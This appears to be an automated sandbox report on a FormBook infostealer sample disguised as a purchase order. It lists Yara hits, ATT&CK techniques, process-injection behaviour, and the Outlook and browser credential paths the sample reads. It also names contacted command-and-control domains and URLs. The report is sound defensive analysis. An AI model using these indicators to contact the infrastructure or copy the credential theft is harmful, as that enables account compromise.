          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception512
          Process Injection          		1
          Rootkit          		1
          OS Credential Dumping          		221
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Masquerading          		1
          Credential API Hooking          		2
          Process Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Disable or Modify Tools          		1
          Input Capture          		31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Input Capture          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
          Virtualization/Sandbox Evasion          		NTDS1
          Remote System Discovery          		Distributed Component Object Model11
          Archive Collected Data          		Scheduled Transfer114
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script512
          Process Injection          		LSA Secrets2
          File and Directory Discovery          		SSH1
          Data from Local System          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common11
          Deobfuscate/Decode Files or Information          		Cached Domain Credentials113
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items4
          Obfuscated Files or Information          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job13
          Software Packing          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 626541 Sample: PO#12108997.exe Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 8 other signatures 2->49 10 PO#12108997.exe 3 2->10         started        process3 file4 33 C:\Users\user\AppData\...\PO#12108997.exe.log, ASCII 10->33 dropped 13 vbc.exe 10->13         started        process5 signatures6 61 Modifies the context of a thread in another process (thread injection) 13->61 63 Maps a DLL or memory area into another process 13->63 65 Sample uses process hollowing technique 13->65 67 2 other signatures 13->67 16 explorer.exe 13->16 injected process7 dnsIp8 35 www.madurababe.net 188.114.97.10, 49839, 49840, 49841 CLOUDFLARENETUS European Union 16->35 37 www.tyz.world 16->37 39 tyz.world 34.102.136.180, 49810, 49811, 49812 GOOGLEUS United States 16->39 41 System process connects to network (likely due to code injection or exploit) 16->41 20 cmmon32.exe 18 16->20         started        signatures9 process10 file11 29 C:\Users\user\AppData\...\3NMlogrv.ini, data 20->29 dropped 31 C:\Users\user\AppData\...\3NMlogri.ini, data 20->31 dropped 51 Detected FormBook malware 20->51 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 3 other signatures 20->57 24 cmd.exe 2 20->24         started        signatures12 process13 signatures14 59 Tries to harvest and steal browser information (history, passwords, etc) 24->59 27 conhost.exe 24->27         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO#12108997.exe35%VirustotalBrowse
          PO#12108997.exe62%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          PO#12108997.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.0.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cnal1%VirustotalBrowse
          http://www.founder.com.cn/cnal0%Avira URL Cloudsafe
          http://www.sajatypeworks.com20%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.fontbureau.commsed0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.madurababe.net0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/h0%URL Reputationsafe
          www.mybenefitassist.com/p12s/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnu0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.founder.com.cn/cnt-p0%URL Reputationsafe
          http://www.fontbureau.comiono?0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/$0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.fontbureau.comB0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.founder.com.cn/cnd0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.fontbureau.comF0%URL Reputationsafe
          http://www.sajatypeworks.comt0%URL Reputationsafe
          http://www.fontbureau.comicta0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/L0%URL Reputationsafe
          http://www.founder.com.cn/cnr-ca0%Avira URL Cloudsafe
          http://www.tyz.world/p12s/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/G0%URL Reputationsafe
          http://www.madurababe.net/p12s/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/?0%URL Reputationsafe
          http://en.w0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/z0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.tyz.world/p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          https://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD0%Avira URL Cloudsafe
          http://www.fontbureau.comals0%URL Reputationsafe
          http://www.fontbureau.comalic0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/c0%URL Reputationsafe
          http://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd0%Avira URL Cloudsafe
          http://www.fontbureau.com~0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          tyz.world
          		34.102.136.180
          		truefalse
            		unknown
            www.madurababe.net
            		188.114.97.10
            		truetrue
              		unknown
              www.tyz.world
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.mybenefitassist.com/p12s/true
                • Avira URL Cloud: safe
                		low
                http://www.tyz.world/p12s/false
                • Avira URL Cloud: safe
                		unknown
                http://www.madurababe.net/p12s/true
                • Avira URL Cloud: safe
                		unknown
                http://www.tyz.world/p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJAfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJdtrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.fontbureau.com/designersGPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.founder.com.cn/cnalPO#12108997.exe, 00000000.00000003.243309494.00000000062C8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.sajatypeworks.com2PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.240907648.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244685656.00000000062DB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/?PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bThePO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.commsedPO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.tiro.comPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.goodfont.co.krPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.comPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.240907648.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netDPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cn/cThePO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/staff/dennis.htmPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://fontfabrik.comPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.madurababe.netcmmon32.exe, 00000011.00000002.504383101.0000000005219000.00000004.10000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.jiyu-kobo.co.jp/jp/hPO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnuPO#12108997.exe, 00000000.00000003.243228061.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/DPleasePO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnt-pPO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.comiono?PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fonts.comPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.sandoll.co.krPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.urwpp.deDPleasePO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/$PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.zhongyicts.com.cnPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comBPO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.sakkal.comPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cndPO#12108997.exe, 00000000.00000003.243309494.00000000062C8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.comPO#12108997.exe, 00000000.00000002.274185090.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.269352701.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.galapagosdesign.com/PO#12108997.exe, 00000000.00000003.253530830.00000000062F0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comFPO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comtPO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244685656.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242576157.00000000062DB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comictaPO#12108997.exe, 00000000.00000002.274185090.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.269352701.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/LPO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cnr-caPO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/GPO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/jp/PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comaPO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comdPO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/?PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://en.wPO#12108997.exe, 00000000.00000003.241230450.00000000062C6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
